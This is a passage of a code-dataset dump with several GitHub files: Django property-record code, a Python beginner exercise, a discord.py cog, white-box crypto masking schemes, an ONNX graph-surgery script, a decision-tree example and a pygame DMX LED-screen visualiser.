self.read_prosecutors(new_values_enc['prosecutor_id'])\n enc.prosecutor_id = prosecutor\n\n # debtor\n debtor = self.read_debtors(new_values_enc['debtor_id'])\n enc.debtor_id = debtor\n\n # reason document\n enc.reason_document.name = new_values_rd['name']\n enc.reason_document.description = new_values_rd['description']\n enc.reason_document.save()\n\n enc.encumbrance_kind = new_values_enc['encumbrance_kind']\n enc.encumbrance_type = new_values_enc['encumbrance_type']\n enc.debt_amount = new_values_enc['debt_amount']\n enc.deadline = new_values_enc['deadline']\n\n # object\n enc.object_id.serial_number = new_values_obj['serial_number']\n enc.object_id.description = new_values_obj['description']\n enc.object_id.save()\n\n enc.save()\n\n def create_debtor(self, debt, addr):\n address = Address(index=addr['index'], city=addr['city'],\n country=addr['country'], street=addr['street'])\n address.save()\n\n debtor = Debtor(full_name=debt['full_name'], code=debt['code'],\n options=debt['options'], address_id=address)\n debtor.save()\n\n def create_prosecutor(self, pros, addr):\n address = Address(index=addr['index'], city=addr['city'],\n country=addr['country'], street=addr['street'])\n address.save()\n\n prosecutor = Prosecutor(full_name=pros['full_name'], code=pros['code'],\n options=pros['options'], address_id=address)\n prosecutor.save()\n","repo_name":"Tayum/SRMP","sub_path":"SRMP/property/postgres_manage.py","file_name":"postgres_manage.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40996166425","text":"lista = []\npares = []\nimpares = []\ncontinuar = 's'\nwhile 'n' not in continuar:\n lista.append(int(input('Adicione um valor: ')))\n continuar = str(input('continuar [S/N]: '))\nfor r in range(0, len(lista)):\n if lista[r] % 2 == 0:\n pares.append(lista[r])\n else:\n impares.append(lista[r])\nprint(f'Lista: {lista}')\nprint(f'Pares: {pares}')\nprint(f'Ímpares: {impares}')\n","repo_name":"Lu1zReis/exercicios-Python","sub_path":"testes e exercícios/exercicios/script_082.py","file_name":"script_082.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41405713610","text":"import discord\nfrom discord.ext import commands\nfrom discord import app_commands\n\n\nclass GroupExample(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n class Group(app_commands.Group):\n \"\"\"Пример группы. Это описание команды кста.\"\"\"\n @app_commands.command(description=\"Что-то добавим\")\n async def add(self, interaction: discord.Interaction):\n await interaction.response.send_message(\"Что-то добавлено\")\n \n @app_commands.command(description=\"Что-то убираем\")\n async def remove(self, interaction: discord.Interaction):\n await interaction.response.send_message(\"Что-то убрано\")\n \n self.bot.tree.add_command(Group()) # НЕ ЗАБЫВАЕМ ЭТО\n\n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(GroupExample())","repo_name":"MadCat9958/discord.pyCogs","sub_path":"cogs/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72017484354","text":"#-*- coding:utf-8 -*-\n\nfrom whitebox.orderer import Orderer, circuit_inputs\nfrom operator import xor\n\nclass MaskingScheme(object):\n NOT = OR = XOR = AND = ZERO = ONE = NotImplemented\n\n def __init__(self, rand, nshares=2):\n \"\"\"rand() -> random bit\"\"\"\n self.rand = rand\n self.nshares = int(nshares)\n assert nshares >= 2 # maybe 1 is useful for debugging purposes?\n\n def encode(self, x):\n raise NotImplementedError()\n\n def decode(self, x):\n raise NotImplementedError()\n\n def refresh(self, x):\n raise NotImplementedError()\n\n def __repr__(self):\n return \"\" % (type(self).__name__, self.nshares, self.rand)\n\n\nclass DOM(MaskingScheme):\n def encode(self, s):\n x = [self.rand() for _ in xrange(self.nshares-1)]\n x.append(reduce(xor, x) ^ s)\n return tuple(x)\n\n def decode(self, x):\n return reduce(xor, x)\n\n def XOR(self, x, y):\n assert len(x) == len(y) == self.nshares\n return tuple(xx ^ yy for xx, yy in zip(x, y))\n\n def AND(self, x, y):\n assert len(x) == len(y) == self.nshares\n matrix = [[xx & yy for yy in y] for xx in x]\n for i in xrange(1, self.nshares):\n for j in xrange(i + 1, self.nshares):\n r = self.rand()\n matrix[i][j] ^= r\n matrix[j][i] ^= r\n return tuple(reduce(xor, row) for row in matrix)\n\n def NOT(self, x):\n assert len(x) == self.nshares\n return (~x[0],) + tuple(x[1:])\n\n def RANDOM(self):\n # more efficient random shares\n Bit = self.Bit\n return (Bit.const(0),) * (self.nshares - 1) + (Bit(Bit.OP.RANDOM),)\n\n def refresh(self, x):\n raise NotImplementedError()\n\nclass MINQ(MaskingScheme):\n def __init__(self, rand):\n super(MINQ, self).__init__(rand=rand, nshares=3)\n\n def encode(self, s):\n a = self.rand()\n b = self.rand()\n c = (a & b) ^ s\n return a, b, c\n\n def decode(self, x):\n return (x[0] & x[1]) ^ x[2]\n\n def rand3(self):\n return (self.rand(), self.rand(), self.rand())\n\n def refresh(self, x, rs=None):\n a, b, c = x\n if rs is None:\n rs = self.rand3()\n ra, rb, rc = rs\n ma = ra & (b ^ rc)\n mb = rb & (a ^ rc)\n rmul = (ra ^ rc) & (rb ^ rc)\n rc ^= ma ^ mb ^ rmul\n a ^= ra\n b ^= rb\n c ^= rc\n return a, b, c\n\n def XOR(self, x, y):\n rxs = ra, rb, rc = self.rand3()\n rys = rd, re, rf = self.rand3()\n a, b, c = self.refresh(x, rs=rxs)\n d, e, f = self.refresh(y, rs=rys)\n x = a ^ d\n y = b ^ e\n ae = a & e\n bd = b & d\n z = c ^ f ^ ae ^ bd\n return x, y, z\n\n def AND(self, x, y):\n rxs = ra, rb, rc = self.rand3()\n rys = rd, re, rf = self.rand3()\n a, b, c = self.refresh(x, rs=rxs)\n d, e, f = self.refresh(y, rs=rys)\n\n ma = (b & f) ^ (rc & e)\n md = (c & e) ^ (rf & b)\n x = rf ^ (a & e)\n y = rc ^ (b & d)\n ama = a & ma\n dmd = d & md\n rcrf = rc & rf\n cf = c & f\n z = ama ^ dmd ^ rcrf ^ cf\n return x, y, z\n\n def NOT(self, x):\n return x[0], x[1], ~x[2]\n\n def RANDOM(self):\n # more efficient random shares\n Bit = self.Bit\n return Bit.const(0), Bit.const(0), Bit(Bit.OP.RANDOM())\n\n\n\ndef mask_circuit(ybits, scheme, encode=True, decode=True):\n \"\"\"\n Mask a given circuit with a given masking scheme.\n WARNING: assumes absence of constant bits (e.g. using OptBitNode)\n \"\"\"\n scheme.Bit = Bit = type(ybits[0])\n\n xbits = circuit_inputs(ybits)\n if encode:\n xbits_shares = [scheme.encode(xbit) for xbit in xbits]\n else:\n xbits_shares = [Bit.inputs(xbit.name(), tostr=False) for xbit in xbits]\n\n shares = dict(zip(xbits, xbits_shares)) # bit -> shares of bit\n\n for action, bit in Orderer(ybits, quiet=True).compile().code:\n if action != \"compute\":\n continue\n\n func = getattr(scheme, Bit.OP.name[bit.op])\n args = [shares[arg] for arg in bit.args]\n res = func(*args)\n shares[bit] = res\n\n ybits_shares = tuple(shares[ybit] for ybit in ybits)\n if decode:\n return tuple(scheme.decode(yshares) for yshares in ybits_shares)\n else:\n return ybits_shares\n","repo_name":"cryptolu/whitebox","sub_path":"synthesis/whitebox/masking.py","file_name":"masking.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"61"} +{"seq_id":"23941383505","text":"import argparse\nimport onnx\nimport onnx_graphsurgeon as gs\nimport numpy as np\n\nfrom collections import OrderedDict\nimport sys\nsys.path.append('/root/hx/NVHackathonCompetition/')\nfrom utils.print_color_txt import colorstr\n\n\ndef surgeon(onnx_path):\n # 读取 .onnx 并进行调整\n graph = gs.import_onnx(onnx.load(onnx_path))\n print(colorstr('加载模型:')+onnx_path,\"节点数量:\",colorstr('red',str(len(graph.nodes))))\n # 从slice45开始往下找\n ConstantOfShapeNode = None\n ShapeNode = None\n ScatterNDNode = None\n\n nWindowsMask = 0\n # ------------------------------------------------------添加shift_window 的plugin\n for node_id, node in enumerate(graph.nodes):\n\n if node.name == \"ConstantOfShape_1032\": \n ConstantOfShapeNode = node\n if node.name == \"Shape_1078\": \n ShapeNode = node\n if node.name == \"ScatterND_1995\": \n ScatterNDNode = node\n\n if ConstantOfShapeNode is not None and ShapeNode is not None and ScatterNDNode is not None:\n img_mask = ConstantOfShapeNode.outputs[0]\n img_mask_shape = ShapeNode.outputs[0]\n WindowsMaskN = gs.Node(\"WindowsMask\", \"WindowsMask_\" + str(nWindowsMask), inputs=[img_mask, img_mask_shape], outputs=[ScatterNDNode.outputs[0]])\n\n WindowsMaskN.attrs = OrderedDict(\n window_size = np.array([8],dtype=np.int32),\n shift_size = np.array([4],dtype=np.int32),\n plugin_version = \"1\",\n plugin_namespace = \"\"\n )\n\n graph.nodes.append(WindowsMaskN)\n nWindowsMask += 1\n ScatterNDNode.outputs = []\n # ------------------------------------------------------添加不带shift 的plugin\n ConstantOfShapeNode = None\n ShapeNode = None\n ScatterNDNode = None\n\n for node in graph.nodes:\n if node.name == \"ConstantOfShape_63\": \n ConstantOfShapeNode = node\n if node.name == \"Shape_109\":\n ShapeNode = node\n if node.name == \"ScatterND_966\": \n ScatterNDNode = node\n\n if ConstantOfShapeNode is not None and ShapeNode is not None and ScatterNDNode is not None:\n img_mask = ConstantOfShapeNode.outputs[0]\n img_mask_shape = ShapeNode.outputs[0]\n\n WindowsMaskN = gs.Node(\"WindowsMask\", \"WindowsMask_\" + str(nWindowsMask), inputs=[img_mask, img_mask_shape], outputs=[ScatterNDNode.outputs[0]])\n WindowsMaskN.attrs = OrderedDict(\n window_size = np.array([8],dtype=np.int32),\n shift_size = np.array([0],dtype=np.int32),\n plugin_version = \"1\",\n plugin_namespace = \"\"\n )\n graph.nodes.append(WindowsMaskN)\n nWindowsMask += 1\n ScatterNDNode.outputs.clear()\n # ------------------------------------------------------end\n print('完成'+colorstr('red',str(nWindowsMask))+'个WindowsMask节点的替换')\n # print(f\"nWindowsMask: {nWindowsMask}\")\n\n graph.cleanup().toposort()\n surgeon_onnx_path = onnx_path.replace(\".onnx\", \"_mask.onnx\")\n onnx.save(gs.export_onnx(graph), surgeon_onnx_path)\n print(colorstr(\"新模型节点数:\") ,colorstr('red',str(len(graph.nodes))) )\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--onnxFile\", type=str, default=\"./onnx_zoo/SwinIR_LN.onnx\",\n help=\"onnx file path.\")\n args = parser.parse_args()\n surgeon(args.onnxFile)\n","repo_name":"hhhhhanxu/NVHackathonCompetition","sub_path":"make_surgeon/onnx_surgeon_mask.py","file_name":"onnx_surgeon_mask.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39082503183","text":"#import statements\nimport numpy as np\nimport collections\nimport pydotplus\nfrom sklearn import tree\nimport graphviz\n\n# Data Collection\nX = [ [0,0],\n [1,0],\n [1,1],\n [2,1],\n [2,1],\n [2,0]]\n\nrain = np.array(['not rain', 'not rain', 'not rain', 'rain', 'rain', 'not rain'])\ndata_feature_names = [ 'weather_type', 'atmospheric_pressure']\n\n# Training\nclf = tree.DecisionTreeClassifier()\nclf = clf.fit(X,rain)\n\n# Visualize data\ndot_data = tree.export_graphviz(clf,\n feature_names=data_feature_names,\n out_file=None,\n filled=True,\n rounded=True)\ngraph = pydotplus.graph_from_dot_data(dot_data)\n\ncolors = ('turquoise', 'orange')\nedges = collections.defaultdict(list)\n\nfor edge in graph.get_edge_list():\n edges[edge.get_source()].append(int(edge.get_destination()))\n\nfor edge in edges:\n edges[edge].sort()\n for i in range(2):\n dest = graph.get_node(str(edges[edge][i]))[0]\n dest.set_fillcolor(colors[i])\n\ngraph.write_png('tree.png')\n","repo_name":"srinidhi151/Book","sub_path":"Part 2/Chapter 10/Decision_tree_classification_example_in_python(Listing_4).py","file_name":"Decision_tree_classification_example_in_python(Listing_4).py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"14690766717","text":"\nimport math\nimport random\nimport time\nimport os\n\nHOME = os.getenv('HOME')\n\nfrom optparse import OptionParser\n...\nparser = OptionParser()\nparser.add_option(\"-m\", \"--mode\", dest=\"mode\",\n help=\"pixel mode\") #, metavar=\"FILE\")\n\nparser.add_option(\"-X\", \"--XX\", dest=\"XX\", #default=1,\n help=\"x-split\") #, metavar=\"FILE\")\n\nparser.add_option(\"-x\", \"--xx\", dest=\"xsplit\", #default=1,\n help=\"x-split\") #, metavar=\"FILE\")\nparser.add_option(\"-y\", \"--yy\", dest=\"ysplit\",#default=1,\n help=\"y-split\") #, metavar=\"FILE\")\n\n#parser.add_option(\"-f\", \"--file\", dest=\"filename\",\n# help=\"write report to FILE\", metavar=\"FILE\")\n#parser.add_option(\"-q\", \"--quiet\",\n# action=\"store_false\", dest=\"verbose\", default=True,\n# help=\"don't print status messages to stdout\")\n\n(options, args) = parser.parse_args()\n\nSTART = time.time()\n\n\n# ===== ARTNET DMX =========\n\nimport memcache\nmc = memcache.Client(['127.0.0.1:11211'], debug=0)\n\ndef read_index():\n ips=mc.get(\"index\")#cmd)\n if ips is None:\n ips = {}\n\n #for k,v in ips.items():\n # print(k,v)\n return ips\n\ndef select_ip(ips, univ=2): # artnet univ\n _univ = \":{}\".format(univ)\n for ip in ips: #high priority\n if \"2.0.0\" in ip and _univ in ip:\n return ip\n\n for ip in ips:\n if \"ltp-out\" in ip and _univ in ip:\n return ip\n\nFUNC = 0\n\n\n\ndef read_dmx(ip):\n global frame\n r = \"\"\n if ip:\n #t = int(math.sin(time.time() - s)*10)\n r = mc.get(ip) #\"2.0.0.13:2\")\n frame += 1\n rr = [0]*512\n for i,v in enumerate(r):\n try: #cleanup ltp-out to int\n v = int(v)\n rr[i] = v\n except:pass\n r = rr\n\n\n if not r:\n c = 0\n #time.sleep(0.1)\n r = [0] *512\n for i in range(12*8+1):\n dmx = i*4\n #print(dmx)\n r[dmx:dmx+4] = [255,10,10,40] \n return r\n\n\n\n# ===== ARTNET DMX =========\n\n\n\np = 16\nblock = [p,p]\n_x = 8\n_y = 8\n\n\n#HD = \"0\"\nif options.mode:\n try:\n HD = options.mode\n p,_x,_y = HD.split(\",\")\n _x = int(_x)\n _y = int(_y)\n p = int(p)\n block = [p,p]\n except Exception as e:\n print( \"Exc\",options.mode,e)\n\nHD_x = 2\nHD_y = 2\n\nprint( [options.xsplit])\nprint( [options.ysplit])\n\ntry:\n if options.xsplit:\n HD_x = int(options.xsplit)\n if options.ysplit:\n HD_y = int(options.ysplit)\nexcept Exception as e:\n print( \"Exc\",options.mode,e)\n\nprint(\"HD\",HD_x,HD_y)\nprint(\"xy\",_x,_y)\nprint(\"++++++++++++++++++\", p,_x,_y)\n\n_x2 = _x\n\ntry:\n if options.XX:\n _x2 = int(options.XX)\nexcept Exception as e:\n print( \"Exc\",options.mode,e)\nprint(\"_x2 , -X\",_x2)\n# ===== GUI =========\nimport pygame\nimport pygame.gfxdraw\nimport pygame.font\n\nos.environ['SDL_VIDEO_WINDOW_POS'] = '%i,%i' % (200,164)\nos.environ['SDL_VIDEO_CENTERED'] = '0'\n\npg = pygame\npygame.init()\npygame.mixer.quit()\n\n\nf = pygame.font.get_fonts()\nfor i in f:\n if \"mono\" in i.lower():\n print(i)\n \n\nfont = pygame.font.SysFont(\"freemonobold\",22)\nfont10 = pygame.font.SysFont(\"freemonobold\",10)\nfont12 = pygame.font.SysFont(\"freemonobold\",12)\nfont15 = pygame.font.SysFont(\"freemonobold\",15)\n#font = pygame.font.SysFont(None,30)\n\nfr = font.render(\"hallo\" ,1, (200,0,255))\n\n\n\n\n\nmain_size=(600,500)\ntry:\n wx = 100+block[0] * _x\n wy = 100+block[1] * _y\n main_size=(wx,wy)\n\nexcept Exception as e:\n print(\"Exception:\",e)\n#main_size=(280,200)\n\nwindow = pygame.display.set_mode(main_size,pg.RESIZABLE)#,32)#,pygame.FULLSCREEN) #x left->right ,y top-> bottom\npg.display.set_caption('LibreLight LED-SCREEN')\n\n\nclass Fix():\n def __init__(self,_id,pos,block=[16,16],univ=0,dmx=0,ch=4):\n #print(\"Fix\",_id)\n self._id = _id\n self.dmx = (_id-1) * ch +1 #dmx\n self.univ = univ\n self.ch = ch\n self.pos = pos\n self.rgb = [0,0,0]\n self.block = block #[10,10]\n self.x = pos[0]\n self.y = pos[1]\n self.strobo = time.time()\n self.bmp = 250\n self.sub_fix = []\n \n sub_block =[block[0]/HD_x,block[1]/HD_y] \n if _id <= 0: #exit \n return\n\n spalte = (_id-1)%_y +1\n zeile = int((_id-1)/_x2) #+1\n #zeile = zeile*_x*HD_x*HD_y\n\n add_row = _x*HD_x*HD_y\n\n #zeile 1\n sid = (_id-1)*2 + zeile*HD_x*_x2\n #for i in range(1,HD_x):\n sid = sid+1\n #sid = zeile\n sub_pos= [pos[0]*block[0],pos[1]*block[1]]\n sub_fix = SubFix(sid,sub_pos,sub_block,univ,dmx,ch)\n self.sub_fix.append(sub_fix)\n\n sid = sid+1\n #sid = zeile\n sub_pos= [pos[0]*block[0]+block[0]/2,pos[1]*block[1]]\n sub_fix = SubFix(sid,sub_pos,sub_block,univ,dmx,ch)\n self.sub_fix.append(sub_fix)\n\n #zeile 2\n sid = (_id-1)*2+1 + _x2*HD_x + zeile*HD_x*_x2 # int(add_row)\n #sid = sid+1\n #sid = HD_x\n sub_pos= [pos[0]*block[0],pos[1]*block[1]+block[1]/2]\n sub_fix = SubFix(sid,sub_pos,sub_block,univ,dmx,ch)\n self.sub_fix.append(sub_fix)\n\n #sid = sid+1\n sid = sid+1 \n sub_pos= [pos[0]*block[0]+block[0]/2,pos[1]*block[1]+block[1]/2]\n sub_fix = SubFix(sid,sub_pos,sub_block,univ,dmx,ch)\n self.sub_fix.append(sub_fix)\n\n\n def calc(self,data):\n _rgb = [0,255,0]\n return _rgb\n\n def sub_calc(self,data):\n _rgb = [0,255,0]\n for sub_fix in self.sub_fix:\n sub_fix.block = self.block[:]\n _rgb = sub_fix.calc(data)\n return _rgb\n \n \n def POS(self,x=0,y=0,a=0,b=0):\n A = (self.pos[0])*self.block[0]\n B = (self.pos[1])*self.block[1]\n C = self.block[0]-a\n D = self.block[1]-b\n return [x+A,y+B,C,D]\n\n def subPOS(self,x=0,y=0,a=0,b=0):\n __out = []\n for sub_fix in self.sub_fix:\n __out.append( sub_fix.POS(x,y,a,b) )\n return __out \n\n\nclass SubFix():\n def __init__(self,_id,pos,block=[16,16],univ=0,dmx=0,ch=4):\n #print(\"Fix\",_id)\n self._id = _id\n self.dmx = (_id-1) * ch +1 #dmx\n self.univ = univ\n self.ch = ch\n self.pos = pos\n self.rgb = [0,0,40]\n self.block = block #[10,10]\n self.x = pos[0]\n self.y = pos[1]\n self.strobo = time.time()\n self.bmp = 250\n\n def calc(self,data):\n #return [130,30,20]\n dmx_sub = [30]*10\n #print(dmx_sub)\n dmx = self.dmx -1\n _dmx_sub = []\n if self.dmx >= 0:\n dmx = rDMX(self.univ,self.dmx)-1\n if dmx+self.ch < len(data):\n _dmx_sub = data[dmx:dmx+self.ch]\n if _dmx_sub:\n dmx_sub = _dmx_sub\n #print(dmx_sub)\n dim = dmx_sub[0]/255\n\n #print(\"dmx\",dmx,dmx_sub)\n r = dmx_sub[1]*dim\n g = dmx_sub[2]*dim\n b = dmx_sub[3]*dim\n\n r = int(r)\n g = int(g)\n b = int(b)\n self.rgb = [r,g,b]\n return self.rgb\n \n def POS(self,x=0,y=0,a=0,b=0):\n A = (self.pos[0]) #+self.block[0]\n B = (self.pos[1]) #+self.block[1]\n C = self.block[0]-a\n D = self.block[1]-b\n if NR:\n C-=1\n D-=1\n return [int(x+A),int(y+B),int(C),int(D)]\n\nclass POINTER():\n def __init__(self):\n self.pos = [0,0,0,0]\n self.on = 0\n self.rgb = [0,100,10]\n self._x = 0\n self._y = 0\n self.x = 0\n self.y = 0\n self.fix = Fix(0 ,[999,999],[16,16],0,0,0)\n\n def row_move(self,x,y):\n self._x = x\n self._y = y\n def move(self,pos):\n self.pos = pos\n self.on = 1\n def cross(self,x,y):\n self.x = x\n self.y = y\n\n def draw(self):\n if self.on:\n pygame.draw.rect(window,self.rgb,self.pos)\n #pygame.draw.line(window,self.rgb, (self.pos[0],self.pos[1]) , (self.pos[0]+100,self.pos[1]) ) \n\n \n # mouse grid posision\n fr = font15.render(\"{}/{}\".format(self.fix.x+1,self.fix.y) ,1, (200,200,200))\n \n _nr = self.fix.y * _x + self.fix.x +1\n #fr = font15.render(\"{:02} {}/{}\".format(_nr, self.fix.x+1,self.fix.y+1 ) ,1, (200,200,200))\n fr = font15.render(\"{:02}\".format(_nr ) ,1, (200,200,200))\n\n window.blit(fr,(self.pos[0]+2,self.pos[1]+2 ))\n window.blit(fr,(200,25))\n\n # fix pos\n txt=str(self.pos)\n fr = font15.render(txt ,1, (200,200,200))\n #window.blit(fr,(self.pos[0]+2,self.pos[1]+2 ))\n window.blit(fr,(200,10))\n\n # univers\n #fr = font15.render(\"{:02}:{:03}\".format(self.fix.univ,self.fix.dmx) ,1, (200,200,200))\n #window.blit(fr,(300,10))\n \n # pointer\n fr = font15.render(\"X:{:03}\".format(self._x) ,1, (200,200,200))\n window.blit(fr,(10,30))\n fr = font15.render(\"Y:{:03}\".format(self._y) ,1, (200,200,200))\n window.blit(fr,(10,40))\n\n # crosshair\n self.rgb = [0,0,200]\n pygame.draw.line(window,self.rgb, (self.x-p,self.y) , (self.x-2,self.y) ) \n pygame.draw.line(window,self.rgb, (self.x,self.y-p) , (self.x,self.y-2) ) \n\n self.rgb = [0,200,0]\n pygame.draw.line(window,self.rgb, (self.x+2,self.y) , (self.x+p,self.y) ) \n pygame.draw.line(window,self.rgb, (self.x,self.y+2) , (self.x,self.y+p) ) \n self.rgb = [200,0,0]\n\npointer = POINTER()\n\nNR = 0\n\nrunning = True\ndef event():\n global NR,running\n for event in pygame.event.get(): \n #print(event.dict)\n\n _button = None\n if \"button\" in event.dict:\n _button = event.dict[\"button\"]\n\n _state = None\n if \"state\" in event.dict:\n _state = event.state \n\n _key = None\n if \"key\" in event.dict:\n _key = event.key \n\n _pos = None\n if \"pos\" in event.dict:\n _pos = event.pos \n\n _type = None\n if \"type\" in event.dict:\n _type = event.type \n _type = event.type \n\n _mod = None\n if \"mod\" in event.dict:\n _mod = event.mod \n print( \" \")\n print( \"{:.02f}\".format( time.time() - START ))\n print(\"button -\",_button,end=\"\\t| \")\n #print(\"state -\",_state)\n print(\"pos -\",_pos)\n print(\"type -\",_type, end=\"\\t| \")\n print(\"key -\",_key)\n print(\"mod -\",_mod)\n\n try:\n if _type == 5:\n if _button == 1:\n NR += 1\n if NR > 1:\n NR = 0\n if _button == 3:\n NR -= 1\n if NR < 0:\n NR = 1\n\n if _pos:\n posA = _pos \n fix = find_pix(_pos[0]-40,_pos[1]-60)\n if fix:\n pos = fix.POS(40,60) \n rgb = [0,0,0] \n pointer.move(pos) \n pointer.fix = fix\n else:\n pointer.on = 0\n pointer.row_move(_pos[0],_pos[1]) \n pointer.cross(_pos[0],_pos[1])\n\n if event.type == pygame.VIDEORESIZE:\n window = pygame.display.set_mode((event.w, event.h), pygame.RESIZABLE)\n except Exception as e:\n print(e)\n\n if event.type==pygame.QUIT: \n running=False\n\n\nfps = 0\nframe = 0\nframe_t = time.time()\nIP = \"yyy\"\ndef draw_overlay():\n global fps\n fr = font.render(\"FPS:{}\".format(fps) ,1, (200,0,255))\n window.blit(fr,(10,10))\n\n fr = font.render(\"ip:{}\".format(IP) ,1, (200,0,255))\n window.blit(fr,(80,10))\n\ndef calc_fps():\n global fps,frame,frame_t\n t = time.time()\n if frame_t+1 < t:\n fps = frame #frame_t- t #frame\n frame = 1\n frame_t = time.time()\n\n# ===== GUI =========\n\n\n#def draw_circle(surface, x, y, radius, color):\ndef draw_circle(surface,color, pos, radius):\n x,y=pos\n pygame.gfxdraw.aacircle(surface, int(x), int(y), radius-1, color)\n pygame.gfxdraw.filled_circle(surface, int(x), int(y), radius-1, color)\n\ndef rDMX(univ,dmx):\n return univ*512+dmx\n\ngrid_file = \"/tmp/vpu_grid.csv\"\ngrid_file = HOME+\"/LibreLight/vpu_grid_hd.csv\"\n\ndef generate_grid():\n log = open(grid_file,\"w\")\n head = \"i,univ,dmx,x,y,ch\\n\"\n head = \"i,univ,dmx,ch\\n\"\n head = \"univ,dmx,x,y,ch\\n\"\n head = \"nr,id,info\\n\"\n print(\"csv:\",head)\n log.write(head)\n dmx = 1-1\n ch = 4\n\n y=0\n x=0\n for i in range((_y)*(_x)):\n if x > _x and i%_x == 0:\n print(\"--> -->\")\n x=0\n y+=1\n \n _univ = int(dmx/512)\n _dmx = dmx - (_univ)*512 \n\n pos=[x,y]\n line=\"{},{},{},{},{},{}\\n\".format(i+1,_univ,_dmx+1,pos[0],pos[1],ch)\n line=\"{},{},{},{},{}\\n\".format(_univ,_dmx+1,x,y,ch)\n line=\"{},{},x\\n\".format(i+1,i+1)\n print(\"wcsv:\",[line])\n log.write(line)\n dmx += ch\n x+=1\n log.close()\n return GRID\n\ndef init_grid():\n\n try:\n log = open(grid_file,\"r\")\n except:\n generate_grid()\n log = open(grid_file,\"r\")\n \n lines = log.readlines()\n\n GRID = []\n \n y=0\n x=0\n print(\"CSV header\",[lines[0]])\n\n for i,line in enumerate(lines[1:]): #exclude first line\n #print(\"rcsv\",[line])\n line = line.strip()\n line = line.split(\",\") # csv\n\n if i >= _x and i%_x == 0:\n x=0\n y+=1\n if y > _y:\n break\n\n\n #i = int(line[0])\n _id = int(line[1])\n #univ = int(line[0])\n #dmx = int(line[1])\n #x = int(line[3])\n #y = int(line[4])\n #ch = int(line[4])\n\n pos = [x,y] \n f = Fix(_id,pos,block) #pos,univ,dmx,ch)\n #f.x = x\n #f.y = y \n #f.block = block\n GRID.append(f)\n x+=1\n #print(\"y, _y\",y,_y)\n return GRID\n\ndef find_pix(x,y):\n global GRID\n for fix in GRID:\n X = 0\n Y = 0\n\n pos = fix.POS()\n if x > pos[0] and x < pos[0]+pos[2]:\n X = 1\n if y > pos[1] and y < pos[1]+pos[3]:\n Y = 1\n if X and Y:\n print(pos,x,y)\n print(\"find\",X,Y)\n return fix\n \ndef draw_gobo(window,FUNC,spos,srgb):\n #print(fix.dmx,rgb,pos)\n #pygame.draw.circle(window,rgb,(pos[0]+int(pos[2]/2),pos[1]+int(pos[3]/2)),int(pos[3]/2))\n if FUNC > 10 and FUNC <= 20: # big dot\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/2))\n elif FUNC > 20 and FUNC <= 30:#small dot\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 30 and FUNC <= 40:#donut\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/2))\n draw_circle(window,[0,0,0],(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 40 and FUNC <= 50: # rec with hole\n pygame.draw.rect(window,srgb,spos)\n draw_circle(window,[0,0,0],(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 50 and FUNC <= 60: # rec with big hole\n pygame.draw.rect(window,srgb,spos)\n draw_circle(window,[0,0,0],(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/2))\n elif FUNC > 60 and FUNC <= 70: # rec with donat\n pygame.draw.rect(window,srgb,spos)\n draw_circle(window,[0,0,0],(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/2))\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 70 and FUNC <= 80: # rec boarder\n pygame.draw.rect(window,srgb,[spos[0]+1,spos[1]+1,spos[2]-2,spos[3]-2])\n elif FUNC > 80 and FUNC <= 90: # rec big boarder\n pygame.draw.rect(window,srgb,[spos[0]+2,spos[1]+2,spos[2]-4,spos[3]-4])\n elif FUNC > 90 and FUNC <= 100: # rec thin line\n pygame.draw.rect(window,srgb,spos)\n pygame.draw.rect(window,[0,0,0],[spos[0]+1,spos[1]+1,spos[2]-2,spos[3]-2])\n elif FUNC > 100 and FUNC <= 110: # rec big line\n pygame.draw.rect(window,srgb,spos)\n pygame.draw.rect(window,[0,0,0],[spos[0]+2,spos[1]+2,spos[2]-4,spos[3]-4])\n elif FUNC > 110 and FUNC <= 120: # rec with dot\n pygame.draw.rect(window,srgb,spos)\n pygame.draw.rect(window,[0,0,0],[spos[0]+1,spos[1]+1,spos[2]-2,spos[3]-2])\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n elif FUNC > 120 and FUNC <= 130: # rec inline\n pygame.draw.rect(window,srgb,[spos[0]+2,spos[1]+2,spos[2]-4,spos[3]-4])\n pygame.draw.rect(window,[0,0,0],[spos[0]+3,spos[1]+3,spos[2]-6,spos[3]-6])\n elif FUNC > 130 and FUNC <= 140: # 3 dot (heart)\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2)+2,spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2)-2,spos[1]+int(spos[3]/2)),int(spos[3]/3.5))\n draw_circle(window,srgb,(spos[0]+int(spos[2]/2),spos[1]+int(spos[3]/2)+2),int(spos[3]/3.5))\n else:\n 